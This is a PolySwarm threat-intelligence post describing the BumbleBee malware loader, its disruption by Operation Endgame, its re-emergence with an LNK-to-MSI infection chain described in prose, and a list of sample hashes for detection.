Related Families: BazarLoader, BazaLoader
Executive Summary
BumbleBee is a sophisticated loader. It was first seen in the wild in 2022 and was a replacement for BazarLoader. It recently re-emerged with a new infection chain, indicating an evolving threat.
Key Takeaways
- BumbleBee is a sophisticated loader.
- It was first seen in the wild in 2022 and was a replacement for BazarLoader.
- Despite disruption of malware operations by law enforcement in May 2024, BumbleBee recently re-emerged with a new infection chain.
- Due to the re-emergence of BumbleBee and its shift in TTPs, PolySwarm analysts consider BumbleBee to be an evolving threat.
What is BumbleBee?
BumbleBee is a sophisticated loader. BumbleBee was first seen in the wild in 2022 and was a replacement for BazarLoader. Threat actors obtain access to corporate networks and use BumbleBee to deliver follow-on payloads, including Cobalt Strike beacons and ransomware. It recently re-emerged with a new infection chain, indicating an evolving threat. Netskope reported on this activity.
Conducted earlier this year, Operation Endgame, a Europol operation, was the largest law enforcement operation to target botnets. Its scope included takedown of IcedID, SystemBC, Pikabot, Smokeloader, Trickbot, and BumbleBee. Operation Endgame focused on disrupting malware operations, dismantling their infrastructure, freezing proceeds, and arresting key figures associated with the malware. The operation was successful at the time, resulting in 4 arrests, 16 location searches, takedown or disruption of over 100 servers, and seizure of over 2000 domains.
Despite taking a heavy hit from Operation Endgame in May, BumbleBee appears to be back in business. Along with this renewed activity, BumbleBee is also using a new infection chain. The infection chain begins with a phishing email that coerces the victim to download and extract a ZIP file, then execute the LNK file within. The LNK file, when executed, begins the next phase of infection, resulting in the download and execution of the BumbleBee payload in memory. This method allows the malware to avoid writing the DLL to disk.
When the LNK file is opened, it executes a Powershell command, downloads an MSI file from the C2, and renames it. It then executes and installs the file using msiexec.exe. The threat actors use the /qn option to ensure no user interaction is required for this final step. The use of MSI files to execute payloads is not a new concept. Multiple malware families including DarkGate and Latrodectus are known to use this method. However, it is a new TTP for BumbleBee.
Due to the re-emergence of BumbleBee and its shift in TTPs, PolySwarm analysts consider BumbleBee to be an evolving threat.
IOCs
PolySwarm has multiple samples of BumbleBee.
2bca5abfac168454ce4e97a10ccf8ffc068e1428fa655286210006b298de42fb
c26344bfd07b871dd9f6bd7c71275216e18be265e91e5d0800348e8aa06543f9
0ab5b3e9790aa8ada1bbadd5d22908b5ba7b9f078e8f5b4e8fcc27cc0011cce7
106c81f547cfe8332110520c968062004ca58bcfd2dbb0accd51616dd694721f
c26344bfd07b871dd9f6bd7c71275216e18be265e91e5d0800348e8aa06543f9
0ab5b3e9790aa8ada1bbadd5d22908b5ba7b9f078e8f5b4e8fcc27cc0011cce7
d3f551d1fb2c307edfceb65793e527d94d76eba1cd8ab0a5d1f86db11c9474c3
d1cabe0d6a2f3cef5da04e35220e2431ef627470dd2801b4ed22a8ed9a918768
7df703625ee06db2786650b48ffefb13fa1f0dae41e521b861a16772e800c115
You can use the following CLI command to search for all BumbleBee samples in our portal:
$ polyswarm link list -f BumbleBee
Don’t have a PolySwarm account? Go here to sign up for a free Community plan or subscribe.
Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports.
